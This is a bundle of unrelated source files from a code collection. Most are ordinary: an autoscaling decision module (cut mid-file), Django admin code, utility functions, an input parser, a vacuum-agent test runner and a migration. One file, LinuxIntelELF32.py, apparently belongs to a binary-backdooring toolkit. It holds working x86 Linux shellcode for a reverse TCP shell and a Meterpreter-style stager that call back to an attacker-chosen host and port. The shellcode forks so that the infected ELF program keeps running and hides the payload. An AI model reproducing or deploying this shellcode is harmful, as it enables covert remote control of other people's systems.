self.log.debug("TAKEDECISION state %d lambda range: %d - %d" % (self.currentState, from_inlambda, to_inlambda))
# too low to care, the initial num of nodes can answer 1000 req/sec,
# so consider it as 0 1000 * len(cluster.size)!!
if 0.0 < to_inlambda < 1000:
from_inlambda = 0.0
self.log.debug("TAKEDECISION state %d current lambda %d changed lambda range to: %d - %d"
% (self.currentState, allmetrics['inlambda'], from_inlambda, to_inlambda))
# The subgraph we are interested in. It contains only the allowed transitions from the current state.
from_node = max(int(env_vars["min_cluster_size"]), (self.currentState - env_vars["rem_nodes"]))
to_node = min(self.currentState + int(env_vars["add_nodes"]), int(env_vars["max_cluster_size"]))
#self.my_logger.debug("TAKEDECISION creating graph from node: "+ str(from_node) +" to node "+ str(to_node))
#inject the current number of nodes
allmetrics['current_nodes'] = self.currentState
states = fset.FuzzySet()
# Calculate rewards using the values in memory if any, or defaults
for i in range(from_node, to_node + 1):
            # if this state has not been seen before, estimate what its throughput would need to be
# allmetrics['max_throughput'] = float(i) * float(self.utils.serv_throughput)
allmetrics['num_nodes'] = i
met = {}
if self.measurementsPolicy.startswith('average'):
                met = self.get_averages(str(i))
elif self.measurementsPolicy.startswith('centroid'):
met = self.doKmeans(str(i), from_inlambda, to_inlambda)
#format met output
out_met = {k: int(v) for k,v in met.iteritems()}
self.log.debug("TAKEDECISION state: " + str(i) + " met: " + str(out_met))
if met != None and len(met) > 0:
# Been in this state before, use the measurements
allmetrics['inlambda'] = met['inlambda']
allmetrics['throughput'] = met['throughput']
allmetrics['latency'] = met['latency']
allmetrics['cpu'] = met['cpu']
#self.my_logger.debug("TAKEDECISION adding visited state "+ str(i) +" with gain "+ str(self.memory[str(i)]['r']))
#else:
# No clue for this state use current measurements...
#self.my_logger.debug("TAKEDECISION unknown state "+ str(i) +" with gain "+ str(self.memory[str(i)]['r']))
self.memory[str(i)]['r'] = eval(env_vars["gain"], allmetrics)
# if self.currentState != i:
# self.my_logger.debug(
# "TAKEDECISION adding state " + str(i) + " with gain " + str(self.memory[str(i)]['r']))
states.add(fset.FuzzyElement(str(i), self.memory[str(i)]['r']))
# For the current state, use current measurement
# if self.currentState == i:
# if not self.debug:
# cur_gain = eval(env_vars["gain"], allmetrics)
# # for debugging purposes I compare the current reward with the one computed using the training set
# self.log.debug("TAKEDECISION state %d current reward: %d training set reward: %d"
# % (self.currentState, cur_gain, self.memory[str(i)]['r']))
# self.memory[str(i)]['r'] = cur_gain
# #self.log.debug("TAKEDECISION adding current state " + str(i) + " with gain " + str(cur_gain))
# else:
# cur_gain = (self.memory[str(i)]['r'])
# self.log.debug("TAKEDECISION state %d current state training set reward: %d"
# % (self.currentState, cur_gain))
#
# states.add(fset.FuzzyElement(str(i), cur_gain))
# Create the transition graph
v = []
for i in states.keys():
v.append(i)
v = set(v)
stategraph = fgraph.FuzzyGraph(viter=v, directed=True)
for j in range(from_node, to_node + 1):
if j != self.currentState:
# Connect nodes with allowed transitions from the current node.connect(tail, head, mu) head--mu-->tail
stategraph.connect(str(j), str(self.currentState), eval(env_vars["trans_cost"], allmetrics))
#self.my_logger.debug(
# "TAKEDECISION connecting state " + str(self.currentState) + " with state " + str(j))
# Connect nodes with allowed transitions from node j.
#for k in range(max(int(env_vars["min_cluster_size"]), j - int(env_vars["rem_nodes"])),
# min(j + int(env_vars["add_nodes"]), int(env_vars["max_cluster_size"])+1)):
# if k != j:
# self.my_logger.debug("TAKEDECISION connecting state "+ str(j) +" with state "+ str(k))
# stategraph.connect(str(k), str(j), eval(env_vars["trans_cost"], allmetrics))
#Calculate the V matrix for available transitions
V = {}
for s in range(from_node, to_node + 1):
# Get allowed transitions from this state.
if self.memory[str(s)]['r'] != None:
# For each state s, we need to calculate the transitions allowed.
#allowed_transitions = stategraph.edges(head=str(s))
#Vs = []
# for t in allowed_transitions:
# t[0] is the tail state of the edge (the next state)
# No V from last run
#if self.memory[t[0]]['V'] == None:
# self.memory[t[0]]['V'] = self.memory[t[0]]['r']
# Vs.append(self.memory[t[0]]['r'])
# self.my_logger.debug("TAKEDECISION tail state: "+ t[0] +" head state: "+
# t[1] +" V("+t[0]+") = "+ str(self.memory[t[0]]['V']))
# self.my_logger.debug("TAKEDECISION transition cost from state:"+ str(t[1]) +" to state: "+ str(t[0]) +
# " is "+ str(stategraph.mu(t[1],t[0])))
# The original algo uses previous values of max reward (+ gamma * previous max), we don't
# if len(Vs) > 0:
# V[s] = self.memory[str(s)]['r'] + float(self.utils.gamma) * max(Vs)
# else:
# V[s] = self.memory[str(s)]['r']
V[s] = self.memory[str(s)]['r']
self.log.debug("TAKEDECISION Vs="+str(V))
# Find the max V (the min state with the max value)
max_gain = max(V.values())
max_set = [key for key in V if V[key] == max_gain]
self.log.debug("max set: "+str(max_set))
self.nextState = min(max_set)
self.log.debug("max(V): %d (GAIN=%d)" % (self.nextState, V[self.nextState]))
#self.my_logger.debug("TAKEDECISION next state: "+ str(self.nextState))
# Remember the V values calculated ???
#for i in V.keys():
# self.memory[str(i)]['V'] = V[i]
# self.my_logger.debug("TAKEDECISION V("+ str(i) +") = "+ str(V[i]))
# vis = fuzz.visualization.VisManager.create_backend(stategraph)
# (vis_format, data) = vis.visualize()
#
# with open("%s.%s" % ("states", vis_format), "wb") as fp:
# fp.write(data)
# fp.flush()
# fp.close()
if self.nextState != self.currentState:
self.log.debug("Decided to change state to_next: " + str(self.nextState) + " from_curr: " + str(self.currentState))
# You've chosen to change state, that means that nextState has a greater reward, therefore d is always > 0
current_reward = self.memory[str(self.currentState)]['r']
d = self.memory[str(self.nextState)]['r'] - current_reward
self.log.debug( "Difference is " + str(d) + " abs thres="+str(env_vars['decision_abs_threshold'])+" gte:"+str(float(d) < env_vars['decision_abs_threshold']))
if (current_reward != 0 and (abs(float(d) / current_reward) < env_vars['decision_threshold']))\
or float(d) < env_vars['decision_abs_threshold']:
#false alarm, stay where you are
self.nextState = self.currentState
# skip decision
self.decision["action"] = "PASS"
self.decision["count"] = 0
self.log.debug("ups changed my mind...staying at state: " + str(self.currentState) +
" cause the gain difference is: " + str(abs(d)) +
" which is less than %d%% of the current reward, it's actually %f%%" % (int(100*env_vars['decision_threshold']) ,abs(float(d)*100) / (float(current_reward)+0.001)))
else:
self.log.debug("Difference "+ str(d) + " is greater than threshold ("+str(env_vars['decision_threshold'])+"). Keeping decision")
# If the reward is the same with the state you're in, don't move
# elif (d == 0):
# #false alarm, stay where you are
# self.nextState = self.currentState
# # skip decision
# self.decision["action"] = "PASS"
# self.decision["count"] = 0
# self.log.debug("ups changed my mind...staying at state: " + str(self.currentState) +
# " cause the gain difference is: " + str(abs(d)) +
# " which is less than 10% of the current reward "
# + str(self.memory[str(self.currentState)]['r']))
if self.nextState > self.currentState:
self.decision["action"] = "ADD"
elif self.nextState < self.currentState:
self.decision["action"] = "REMOVE"
self.decision["count"] = abs(int(self.currentState) - int(self.nextState))
#self.log.debug("TAKEDECISION: action " + self.decision["action"] + " " + str(self.decision["count"]) +
# " nodes.")
## Don't perform the action if we're debugging/simulating!!!
if self.debug:
if self.pending_action is None and not self.decision["action"].startswith("PASS"):
self.pending_action = self.decision['action']
self.countdown = 2 * self.decision['count'] * 60 / env_vars['metric_fetch_interval']
#self.currentState = str(self.nextState)
self.log.debug("TAKEDECISION simulation, action will finish in: " + str(self.countdown) + " mins")
else:
self.log.debug("TAKEDECISION Waiting for action to finish: " + str(self.pending_action))
return self.decision
def simulate(self):
self.log.debug("START SIMULATION!!")
## creates a sin load simulated for an hour
# for i in range(0, 3600, 10):
#for i in range(0, 14400, 60): # 4 hours
for i in range(0, 900, 1):
cpu = max(5, 60 * abs(math.sin(0.05 * math.radians(i))) - int(self.currentState))
# lamdba is the query arrival rate, throughput is the processed queries
#l = 60000 + 40000 * math.sin(0.01 * i) + random.uniform(-4000, 4000)
#l = 50000 * math.sin(60 * math.radians(i)/40) + 65000 + random.uniform(-8000, 8000)
#l = 40000 * math.sin(60 * math.radians(i)/50) + 45000 + random.uniform(-4000, 4000)
#l = 30000 * math.sin(0.02 * i) + 55000 + random.uniform(-4000, 4000)
l = 60000 * math.sin(0.04 * i) + 75000 + random.uniform(-6000, 6000)
# first 10 mins
# if i < 1200:
# l = 20000
# elif i < 2400:
# l = 40000
# elif i < 4400:
# l = 60000
# elif i < 6000:
# l = 40000
# elif i < 7200:
# l = 20000
maxThroughput = (float(self.currentState) * float(env_vars["serv_throughput"]))
# latency = 200 # msec
# if (l > maxThroughput):
# latency += (l-maxThroughput)/10 # +100msec for every 1000 reqs queued
#throughput = min(maxThroughput, l)# max throughput for the current cluster
throughput = l #(+/- e ??)
latency = 0.0000004 * l ** 2 + 200 # msec...
if l > maxThroughput:
throughput = maxThroughput - 0.01 * l
latency = 0.00001 * (l - maxThroughput) ** 2 + (0.0000004 * maxThroughput ** 2 + 200) # msec... ?
values = {'latency': latency, 'cpu': cpu, 'inlambda': l, 'throughput': throughput,
'num_nodes': self.currentState}
self.log.debug(
"SIMULATE i: " + str(i) + " state: " + str(self.currentState) + " values:" + str(values)
+ " maxThroughput: " + str(maxThroughput))
            # I think this is not needed because take_decision also runs in debug mode
#self.addMeasurement([self.currentState, str(l), str(throughput), str(latency), str(i)], True)
#if self.pending_action[len(self.pending_action)-1] == "done" :
self.take_decision(values)
time.sleep(1)
return
def simulate_training_set(self):
# run state 12 lambdas
self.log.debug("START SIMULATION!!")
self.debug = True
load = []
for k in range(9, 19):
for j in self.memory[str(k)]['arrayMeas']:
load.append(j[0])
#for i in range(0, 120, 1): # paizei? 1 wra ana miso lepto
for i in range(0, 240*12, 1):
l = load[i]
# throughput = (800 * self.currentState)
# if l < (800 * self.currentState):
# throughput = l
values = {'inlambda': l, 'num_nodes': self.currentState}
self.log.debug(
"SIMULATE i: " + str(i) + " state: " + str(self.currentState) + " values:" + str(values))
self.take_decision(values)
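# Illustrative sketch (not part of tiramola, never called): the centroid selection used by
# RLDecisionMaker.doKmeans, in isolation. Measurements are rows of
# [inlambda, throughput, latency, cpu]; the slice keeps rows whose inlambda falls inside
# the window, and kmeans2 with k=1 returns their centroid. The data below is made up.
def _example_centroid_selection():
    measurements = np.array([[1000., 950., 210., 35.],
                             [1100., 1020., 215., 40.],
                             [5000., 3800., 900., 90.]])
    from_l, to_l = 900., 1200.
    sliced = measurements[(measurements[:, 0] >= from_l) & (measurements[:, 0] <= to_l)]
    centroids, labels = kmeans2(sliced, 1, minit='points')
    # with k=1 the single centroid is simply the mean of the sliced rows
    return {'inlambda': centroids[0][0], 'throughput': centroids[0][1],
            'latency': centroids[0][2], 'cpu': centroids[0][3]}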
if __name__ == '__main__':
fsm = RLDecisionMaker("localhost")
fsm.simulate_training_set()
|
cmantas/tiramola_v3
|
new_decision_module.py
|
Python
|
apache-2.0
| 36,005
| 0.007055
|
from django.contrib import admin
from django.contrib.flatpages.admin import FlatPageAdmin
from django.contrib.flatpages.models import FlatPage
from django.db import models
from suit_redactor.widgets import RedactorWidget
class FlatPageCustom(FlatPageAdmin):
formfield_overrides = {
models.TextField: {'widget': RedactorWidget(editor_options={'lang': 'en'})}
}
admin.site.unregister(FlatPage)
admin.site.register(FlatPage, FlatPageCustom)
|
moshthepitt/product.co.ke
|
core/admin.py
|
Python
|
mit
| 458
| 0.004367
|
#
# Utility functions
#
import sys
from functools import partial
from uuid import UUID
from hashlib import sha1
from os import path, listdir
from zipfile import ZipFile
from subprocess import Popen, TimeoutExpired
import nacl.utils
import nacl.secret
def isValidUUID(uid):
"""
Validate UUID
    @param uid: UUID value to be verified, can be bytes or str
@return: True if UUID valid, else False
"""
try:
        # attempt conversion from bytes to str
uid = uid.decode('ascii')
except AttributeError:
# is already bytes object
pass
except UnicodeDecodeError:
# uid contains non-ascii characters, invalid UUID
return False
try:
out = UUID(uid, version=4)
except ValueError:
return False
# check converted value from UUID equals original value. UUID class is not strict on input
return str(out) == uid
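# Illustrative usage sketch (hypothetical helper, never called): isValidUUID accepts
# str or bytes and only accepts canonical version-4 UUID strings.
def _example_isValidUUID():
    assert isValidUUID('f47ac10b-58cc-4372-a567-0e02b2c3d479')
    assert isValidUUID(b'f47ac10b-58cc-4372-a567-0e02b2c3d479')
    assert not isValidUUID('not-a-uuid')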
def encrypt(safe, *args):
"""
Encrypt all provided data
@param safe: encryption class
@param args: data to be encrypted
@return: encryption output iterable
"""
return (safe.encrypt(a, nacl.utils.random(nacl.secret.SecretBox.NONCE_SIZE)) for a in args)
def sha1sum(filePath, blocksize=1024):
"""
Calculate SHA1 hash of file
@param filePath: Path to hashable file
@param blocksize: Amount of bytes to read into memory before hashing
@return: SHA1 hash value (bytes)
"""
with open(filePath, mode='rb') as f:
out = sha1()
for buf in iter(partial(f.read, blocksize), b''):
out.update(buf)
return bytes(out.hexdigest(), encoding='ascii')
def checkCerts():
"""
    Checks to see if required TLS certificates exist in the Resources directory. Attempts to generate the certificates if they are not found.
@returns: Boolean value based on success
"""
resDir = absolutePath('Resources')
command = None
success = False
# check to see if required certificates exist
if not all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
############
# Check OS
############
if sys.platform in ('linux', 'darwin'):
# bash script run
command = 'sh {}'.format('create_certs_linux.sh')
elif sys.platform == 'win32':
hasOpenSSL = False
# check for openssl requirement (downloaded during installer run)
files = sorted((path.isdir(f), f) for f in listdir(resDir) if f.lower().startswith('openssl-'))
# check for expanded directory and executable
for isDir, ofile in files:
if isDir and path.isfile(path.join(resDir, ofile, 'openssl.exe')):
hasOpenSSL = True
newDir = ofile
break
if not hasOpenSSL and files:
                # sort filenames so the newest version is listed first
for ofile in sorted(f for isDir, f in files if not isDir and path.splitext(f)[1] == '.zip'):
# extract archive
with ZipFile(path.join(resDir, ofile), 'r') as ozip:
newDir = path.join(resDir, path.splitext(ofile)[0])
ozip.extractall(path=newDir)
# verify openssl.exe exists in directory
if path.isfile(path.join(newDir, 'openssl.exe')):
hasOpenSSL = True
break
if hasOpenSSL:
# write openssl directory to config file
with open(path.join(resDir, 'openssl.cfg'), 'w') as config:
config.writelines([newDir])
# windows bat command file
command = r'cmd /c {}'.format('create_certs_windows.bat')
if command:
proc = Popen([command], cwd=resDir, shell=True)
try:
proc.wait(180)
except TimeoutExpired:
proc.kill()
# check command has generated correct files
if all(True if path.isfile(path.join(resDir, cert)) else False for cert in ('server.crt', 'server.key.orig')):
success = True
else:
success = True
return success
def absolutePath(pathname):
"""
Return the absolute path of the given file or directory
@return: absolute path
"""
if getattr(sys, 'frozen', False):
# Frozen application denotes packaged application, modules are moved into a zip
datadir = path.dirname(sys.executable)
else:
# Source based installation, use parent directory of this module's directory
datadir = path.join(path.dirname(__file__), path.pardir)
return path.abspath(path.join(datadir, pathname))
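# --- Illustrative usage sketch (not part of the original module) -----------
# A minimal demonstration of the helpers above; it only runs when the module
# is executed directly and relies solely on imports already made at the top
# of this file (plus uuid4 for a sample value).
if __name__ == '__main__':
    from uuid import uuid4

    # UUID validation accepts both str and bytes input
    print(isValidUUID(str(uuid4())))   # True
    print(isValidUUID(b'not-a-uuid'))  # False

    # Symmetric encryption of several values with a single SecretBox
    box = nacl.secret.SecretBox(nacl.utils.random(nacl.secret.SecretBox.KEY_SIZE))
    token_a, token_b = encrypt(box, b'first secret', b'second secret')
    print(len(token_a), len(token_b))

    # SHA1 of this file and the resolved path of the Resources directory
    print(sha1sum(__file__))
    print(absolutePath('Resources'))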
|
cbrunker/quip
|
lib/Utils.py
|
Python
|
gpl-3.0
| 4,795
| 0.003337
|
# Copyright 2011, Thomas G. Dimiduk
#
# This file is part of GroupEng.
#
# GroupEng is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GroupEng is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with GroupEng. If not, see <http://www.gnu.org/licenses/>.
import re
from .utility import numberize
from .errors import GroupEngFileError
def read_input(infile):
if not hasattr(infile, 'readlines'):
infile = open(infile, 'U')
lines = infile.readlines()
lines = [l.strip() for l in lines if l.strip() != '' and l.strip()[0] != '#']
dek = {}
rules = []
i = 0
while i < len(lines):
line = lines[i]
if re.match('class_?list', line):
dek['classlist'] = split_key(line)[1]
elif re.match('(group_?)?size', line):
dek['group_size'] = split_key(line)[1]
elif re.match('student_identifier', line) or re.match('[Ii][Dd]', line):
dek['student_identifier'] = split_key(line)[1]
elif re.match('number_of_groups', line):
dek['number_of_groups'] = int(split_key(line)[1])
elif re.match('tries', line):
dek['tries'] = int(split_key(line)[1])
elif line[0] == '-':
line = line[1:]
# read a rule
rule = {}
rule['name'] = split_key(line)[0].lower()
rule['attribute'] = split_key(line)[1]
# read extra arguments
while i+1 < len(lines) and lines[i+1][0] != '-':
i += 1
line = lines[i]
key, val = split_key(line)
val = tuple([v.strip() for v in val.split(',')])
vals = []
for v in val:
vals.append(union_group(v))
if len(vals) == 1:
vals = vals[0]
rule[key] = vals
rules.append(rule)
else:
raise GroupEngFileError(line, i+1, infile.name)
i += 1
dek['rules'] = rules
return dek
def split_key(st):
return [s.strip() for s in st.split(':')]
def union_group(item):
items = [i.strip() for i in item.split('=')]
if items[0][0] == '(':
items[0] = items[0][1:]
if items[-1][-1] == ')':
items[-1] = items[-1][:-1]
items = tuple([numberize(i) for i in items])
if len(items) == 1:
items = items[0]
return items
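# --- Illustrative sketch (not part of the original module) -----------------
# read_input() accepts anything with a readlines() method, so a small spec
# can be parsed straight from memory. The keys and the "- rule" syntax follow
# the regexes above; the filename and attribute are made-up example values.
# Assumes Python 3 (io.StringIO holds text).
if __name__ == '__main__':
    import io
    sample = io.StringIO(
        "# blank lines and comments are ignored\n"
        "classlist: students.csv\n"
        "group_size: 4\n"
        "- balance: gpa\n"
    )
    print(read_input(sample))
    # roughly: {'classlist': 'students.csv', 'group_size': '4',
    #           'rules': [{'name': 'balance', 'attribute': 'gpa'}]}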
|
tdimiduk/groupeng
|
src/input_parser.py
|
Python
|
agpl-3.0
| 2,845
| 0.002109
|
import agents as ag
import envgui as gui
# change this line ONLY to refer to your project
import submissions.Porter.vacuum2 as v2
# ______________________________________________________________________________
# Vacuum environment
class Dirt(ag.Thing):
pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt,
# ReflexVacuumAgent, RandomVacuumAgent,
# TableDrivenVacuumAgent, ModelBasedVacuumAgent
]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
        bump = ('Bump' if agent.bump else 'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
# # Launch a Text-Based Environment
# print('Two Cells, Agent on Left:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Right:')
# v = VacuumEnvironment(4, 3)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (2, 1))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (2, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Top:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 1))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
#
# # Repeat, but put Agent on the Right
# print('Two Cells, Agent on Bottom:')
# v = VacuumEnvironment(3, 4)
# v.add_thing(Dirt(), (1, 1))
# v.add_thing(Dirt(), (1, 2))
# a = v2.HW2Agent()
# a = ag.TraceAgent(a)
# v.add_thing(a, (1, 2))
# t = gui.EnvTUI(v)
# t.mapImageNames({
# ag.Wall: '#',
# Dirt: '@',
# ag.Agent: 'V',
# })
# t.step(0)
# t.list_things(Dirt)
# t.step(4)
# if len(t.env.get_things(Dirt)) > 0:
# t.list_things(Dirt)
# else:
# print('All clean!')
#
# # Check to continue
# if input('Do you want to continue [y/N]? ') != 'y':
# exit(0)
# else:
# print('----------------------------------------')
def testVacuum(label, w=4, h=3,
dloc=[(1,1),(2,1)],
vloc=(1,1),
limit=6):
print(label)
v = VacuumEnvironment(w, h)
for loc in dloc:
v.add_thing(Dirt(), loc)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
v.add_thing(a, vloc)
t = gui.EnvTUI(v)
t.mapImageNames({
ag.Wall: '#',
Dirt: '@',
ag.Agent: 'V',
})
t.step(0)
t.list_things(Dirt)
t.step(limit)
if len(t.env.get_things(Dirt)) > 0:
t.list_things(Dirt)
else:
print('All clean!')
# Check to continue
if input('Do you want to continue [Y/n]? ') == 'n':
exit(0)
else:
print('----------------------------------------')
testVacuum('Two Cells, Agent on Left:')
testVacuum('Two Cells, Agent on Right:', vloc=(2,1))
testVacuum('Two Cells, Agent on Top:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,1) )
testVacuum('Two Cells, Agent on Bottom:', w=3, h=4,
dloc=[(1,1), (1,2)], vloc=(1,2) )
testVacuum('Five Cells, Agent on Left:', w=7, h=3,
dloc=[(2,1), (4,1)], vloc=(1,1), limit=12)
testVacuum('Five Cells, Agent near Right:', w=7, h=3,
dloc=[(2,1), (3,1)], vloc=(4,1), limit=12)
testVacuum('Five Cells, Agent on Top:', w=3, h=7,
dloc=[(1,2), (1,4)], vloc=(1,1), limit=12 )
testVacuum('Five Cells, Agent Near Bottom:', w=3, h=7,
dloc=[(1,2), (1,3)], vloc=(1,4), limit=12 )
testVacuum('5x4 Grid, Agent in Top Left:', w=7, h=6,
dloc=[(1,4), (2,2), (3, 3), (4,1), (5,2)],
vloc=(1,1), limit=46 )
testVacuum('5x4 Grid, Agent near Bottom Right:', w=7, h=6,
dloc=[(1,3), (2,2), (3, 4), (4,1), (5,2)],
vloc=(4, 3), limit=46 )
v = VacuumEnvironment(6, 3)
a = v2.HW2Agent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: 'images/wall.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
|
austinban/aima-python
|
submissions/Porter/vacuum2Runner.py
|
Python
|
mit
| 6,343
| 0.006779
|
'''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only (Intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import struct
import sys
class linux_elfI32_shellcode():
"""
Linux ELFIntel x32 shellcode class
"""
def __init__(self, HOST, PORT, e_entry, SUPPLIED_SHELLCODE=None):
#could take this out HOST/PORT and put into each shellcode function
self.HOST = HOST
self.PORT = PORT
self.e_entry = e_entry
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.shellcode = ""
self.stackpreserve = "\x90\x90\x60\x9c"
self.stackrestore = "\x9d\x61"
def pack_ip_addresses(self):
hostocts = []
if self.HOST is None:
print "This shellcode requires a HOST parameter -H"
sys.exit(1)
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
def returnshellcode(self):
return self.shellcode
def reverse_shell_tcp(self, CavesPicked={}):
"""
Modified metasploit linux/x64/shell_reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80")
self.shellcode = self.shellcode1
return (self.shellcode1)
def reverse_tcp_stager(self, CavesPicked={}):
"""
FOR USE WITH STAGER TCP PAYLOADS INCLUDING METERPRETER
Modified metasploit linux/x64/shell/reverse_tcp shellcode
        to correctly fork the shellcode payload and continue normal execution.
"""
if self.PORT is None:
print ("Must provide port")
sys.exit(1)
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += ("\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80"
"\x97\x5b\x68")
#HOST
self.shellcode1 += self.pack_ip_addresses()
self.shellcode1 += "\x68\x02\x00"
#PORT
self.shellcode1 += struct.pack('!H', self.PORT)
self.shellcode1 += ("\x89\xe1\x6a"
"\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10"
"\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b"
"\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1")
self.shellcode = self.shellcode1
return (self.shellcode1)
def user_supplied_shellcode(self, CavesPicked={}):
"""
        For use with position-independent shellcode from the user
"""
if self.SUPPLIED_SHELLCODE is None:
print "[!] User must provide shellcode for this module (-U)"
sys.exit(0)
else:
supplied_shellcode = open(self.SUPPLIED_SHELLCODE, 'r+b').read()
self.shellcode1 = "\x6a\x02\x58\xcd\x80\x85\xc0\x74\x07"
#will need to put resume execution shellcode here
self.shellcode1 += "\xbd"
self.shellcode1 += struct.pack("<I", self.e_entry)
self.shellcode1 += "\xff\xe5"
self.shellcode1 += supplied_shellcode
self.shellcode = self.shellcode1
return (self.shellcode1)
|
codercold/Veil-Evasion
|
tools/backdoor/intel/LinuxIntelELF32.py
|
Python
|
gpl-3.0
| 5,166
| 0.00542
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cms', '0014_auto_20160404_1908'),
]
operations = [
migrations.AlterField(
model_name='cmsplugin',
name='position',
field=models.PositiveSmallIntegerField(default=0, verbose_name='position', editable=False),
),
]
|
rsalmaso/django-cms
|
cms/migrations/0015_auto_20160421_0000.py
|
Python
|
bsd-3-clause
| 391
| 0.002558
|
from . import font
from .indicator import Indicator, IndicatorOptions
from .airspeed import AirspeedIndicator
from .altitude import AltitudeIndicator
from .attitude import AttitudeIndicator
from .compass import CompassIndicator
from .pfd import PFD
from .joystick import Joystick
from . import base_test
|
rbmj/pyflightcontrol
|
pyflightcontrol/base/__init__.py
|
Python
|
apache-2.0
| 305
| 0
|
import src
